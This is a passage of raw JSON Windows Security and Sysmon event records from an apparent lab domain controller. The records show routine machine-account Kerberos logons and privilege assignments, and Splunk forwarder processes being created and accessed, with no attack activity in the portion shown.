Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220401,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E754\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4e754","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220402,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4E754\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54864\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4e754","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54864","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220403,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E79B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4e79b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220404,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4E79B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54865\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4e79b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54865","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220405,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E79B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4e79b","LogonType":"3","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220406,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E8A8\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4e8a8","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220407,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4E8A8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54866\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4e8a8","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54866","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.732\r\nProcessGuid: {A837DB8D-020F-5F25-0000-001033E90400}\r\nProcessId: 4376\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.732","ProcessGuid":"{A837DB8D-020F-5F25-0000-001033E90400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-020F-5F25-0000-001033E90400}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-020F-5F25-0000-001033E90400}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2793,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020F-5F25-0000-001033E90400}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020F-5F25-0000-001033E90400}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 